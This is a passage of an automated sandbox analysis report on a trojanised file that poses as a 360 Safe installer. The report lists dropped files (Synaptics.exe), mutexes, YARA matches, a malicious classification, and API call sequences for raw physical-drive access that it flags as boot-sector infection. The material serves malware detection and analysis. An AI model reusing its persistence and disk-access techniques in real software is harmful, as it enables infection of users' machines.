                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.546053160.0000000067F3F000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename360P2SP.dll0 vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.295025080.0000000003A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dllH vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.295025080.0000000003A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dll0 vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294665518.0000000002A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dllH vs A1FsbRkm5m.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294665518.0000000002A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename360P2SP.dll0 vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exeBinary or memory string: OriginalFileName vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exeBinary or memory string: OriginalFilename360Installer.exe> vs A1FsbRkm5m.exe
                              Source: A1FsbRkm5m.exeBinary or memory string: OriginalFilenameb! vs A1FsbRkm5m.exe
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeJump to behavior
                              Source: ._cache_A1FsbRkm5m.exe.0.drBinary string: ?R@SOFTWARE\360Safe\softmgr\dio\\.\%c:\\.\PHYSICALDRIVE%dIndexASSOCIATORS OF {Win32_DiskPartition.DeviceID=Disk #2,Partition #0DeviceIDWQLASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2\Device\Harddisk\\.\c:{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%d<
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@11/243@31/14
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00425FB8 GetLastError,FormatMessageA,2_2_00425FB8
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0041A81C FindResourceA,0_2_0041A81C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile created: C:\Program Files (x86)\360Jump to behavior
                              Source: A1FsbRkm5m.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile read: C:\Users\user\Desktop\A1FsbRkm5m.exeJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\A1FsbRkm5m.exe "C:\Users\user\Desktop\A1FsbRkm5m.exe"
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe "C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe"
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe "C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424Jump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,2_2_00475958
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,5_2_00475958
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile created: C:\Users\user\AppData\Local\Temp\{FCEB6694-C3F8-4b98-98BD-FCDA5F9D7A89}.tmpJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C974EF CLSIDFromProgID,CoCreateInstance,1_2_00C974EF
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00409ED2 GetDiskFreeSpaceA,0_2_00409ED2
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CEC13E CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,1_2_00CEC13E
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 6464
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6508
                              Source: A1FsbRkm5m.exeString found in binary or memory: ExternalIsToolInstallExternalAirInstallTool\Utils\AdvToolsEx.dllAdvToolsEx.dll360DesktopLite\360DesktopLite.exeUtils\360DesktopHelper.exe360desktoplite..\..Software\360\360se6\Update\ClientState\{02E720BD-2B50-4404-947C-65DBE64F6970}UninstallString10.0.2442.0.\..\360secore.exechrome.dll"%s" %s--secore-restore --360se_pid=8000041 --silent-install --not-create-mplnkinstaller\setup.exeThe string has no terminating null character!Fatal error: Out of memory!Unicode string cannot be converted to Ansi!#%dInternal server errorRequired not supportedError response received from gatewayTemporarily overloadedTimed out waiting for gatewayHTTP version not supportedUnknown HTTP Status CodeRetry after doing the appropriate actionUnsupported media typeRequest URI too longRequest entity was too largePrecondition given in request failedThe server refused to accept request w/o a lengthThe resource is no longer availableUser should resubmit with more infoServer timed out waiting for requestProxy authentication requiredNo response acceptable to client foundMethod is not allowedObject not foundRequest forbiddenHTTP/1.1: keep same verbInvalid SyntaxAccess deniedPayment requiredRedirection to proxy, location header specifies proxy to useObject permanently movedObject temporarily movedRedirection w/ new access methodIf-modified-since was not modifiedServer couldn't decide what to returnPartial completionNo info to returnRequest completed, but clear formPartial GET fulfilledAsync completion (TBS)OK to continue with requestServer has switched protocols in upgrade headerRequest completedObject created. Reason = new URIRange:Invalid parameters passed to compression function. Read the documentation!Could not create the directory where to save the CAB file.To store files with names containing Unicode characters into the CAB file you must enable UTF8 encoding!Cabinet.dll does not support compressing files bigger than 2 GB.The name of the CAB file must never contain characters above ASCII 127.Failure compressing dataClient requested abortCould not create cabinet fileCould not create a temporary fileInsufficient memory in FCIFailure reading file to be stored in cabinetFailure opening file to be stored in cabinetUnknown errorThere must be only one CExtract instance per thread at the same time! Call CleanUp() before you use another instance in the same thread!Cabinet.dll does not support calling the same CAB context from two different threads.Invalid CAB file: Extracted file is longer than declared in fdintCOPY_FILEThe CAB archive is encrypted but no decryption key was set.The CAB archive is not encrypted but a decryption key was set.Internet Explorer is switched to Offline mode.An internet error occurred.The path is too long. (Max 250 Ansii characters or approx 100 Unicode characters).The specified resource could not be opened.Invalid parameters passed to extraction function. Read the documentation!Could not load Wininet.dllCould not read CAB fileCould not load Cabinet.dllUser abor
                              Source: A1FsbRkm5m.exeString found in binary or memory: ? /FORCECOVER/FORCECOVER/pid=%s /D= %s /NOTIFYWND=%d /instver=%s /SETHOMEPAGE=%sFALSETRUE/pid=%s /noreboot=1 /installer=1 /SMARTSILENCEck(W
                              Source: A1FsbRkm5m.exeString found in binary or memory: F--silent-install=3_1_1 --homepage=http://hao.360.com
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\Qjq6gY9.iniJump to behavior
                              Source: Yara matchFile source: A1FsbRkm5m.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 5.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.A1FsbRkm5m.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.A1FsbRkm5m.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.280600847.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.404477075.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.268169059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.375038876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4F28.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                              Source: A1FsbRkm5m.exeStatic file information: File size 4148224 > 1048576
                              Source: A1FsbRkm5m.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a400
                              Source: Binary string: C:\vmagent_new\bin\joblist\524876\out\Release\360Installer.pdb source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.dr
                              Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545731022.0000000067C25000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: C:\vmagent_new\bin\joblist\524876\out\Release\360Installer.pdb source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.dr
                              Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545731022.0000000067C25000.00000002.00000001.01000000.00000009.sdmp
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406B3C push 00406B8Dh; ret 0_2_00406B85
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00422044 push ecx; mov dword ptr [esp], edx0_2_00422049
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_004091D4 push ecx; mov dword ptr [esp], ecx0_2_004091D9
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00421208 push ecx; mov dword ptr [esp], edx0_2_0042120A
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040F296 push 0040F307h; ret 0_2_0040F2FF
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00417308 push 0041737Eh; ret 0_2_00417376
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00417380 push 00417428h; ret 0_2_00417420
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0041742A push 00417578h; ret 0_2_00417570
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00447578 push ecx; mov dword ptr [esp], edx0_2_0044757C
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_004037F0 push eax; ret 0_2_0040382C
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040E970 push ecx; mov dword ptr [esp], edx0_2_0040E975
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00407A50 push ecx; mov dword ptr [esp], eax0_2_00407A51
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0041CAC0 push ecx; mov dword ptr [esp], ecx0_2_0041CAC5
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00419AB0 push ecx; mov dword ptr [esp], edx0_2_00419AB5
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00419CD8 push ecx; mov dword ptr [esp], edx0_2_00419CDD
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00407CA4 push 00407FF8h; ret 0_2_00407FF0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0041BCB4 push ecx; mov dword ptr [esp], edx0_2_0041BCB5
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00417D68 push 00417DB5h; ret 0_2_00417DAD
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406D6C push 00406D98h; ret 0_2_00406D90
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406DE4 push 00406E10h; ret 0_2_00406E08
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00419DF4 push ecx; mov dword ptr [esp], edx0_2_00419DF9
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0041DE70 push ecx; mov dword ptr [esp], edx0_2_0041DE72
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00417E30 push 00417E5Ch; ret 0_2_00417E54
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00419E38 push ecx; mov dword ptr [esp], edx0_2_00419E3D
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0040EF92 push 0040F294h; ret 0_2_0040F28C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C97290 push ecx; mov dword ptr [esp], 00000000h1_2_00C97291
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D01632 push ecx; ret 1_2_00D01645
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C839B0 push ecx; mov dword ptr [esp], 00000000h1_2_00C839B1
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00D00A01 push ecx; ret 1_2_00D00A14
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C83C30 push ecx; mov dword ptr [esp], 00000000h1_2_00C83C31
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00446564 push 004465F1h; ret 2_2_004465E9
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CA51B6 GetCurrentThreadId,TlsGetValue,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00CA51B6

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Jump to dropped file
                              Contains functionality to infect the boot sector
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_00CFE360
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d1_2_00CFE720
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C866F0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C86759
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00CFE8B0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C96800
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d1_2_00C96A40
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\ProgramData\Synaptics\RCX4F28.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile created: C:\ProgramData\Synaptics\RCX4F28.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeFile created: C:\Users\user\AppData\Local\Temp\{5E55AF9C-DBB2-486f-91C7-C9168C19150A}.tmp\360P2SP.dllJump to dropped file

                              Boot Survival

                              barindex
                              Contains functionality to infect the boot sector
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_00CFE360
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d1_2_00CFE720
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C866F0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C86759
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00CFE8B0
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00C96800
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d1_2_00C96A40
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0045A054
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00C9BC79 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,1_2_00C9BC79
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00459934
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_0045A054
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_0045A104
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,2_2_0042C6FC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0044083C IsIconic,GetCapture,2_2_0044083C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_0045695C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_004410F0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_00441A14
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,5_2_00459934
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0045A054
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0045A104
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,5_2_0042C6FC
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0044083C IsIconic,GetCapture,5_2_0044083C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,5_2_0045695C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,5_2_004410F0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,5_2_00441A14
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0042E3B4
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
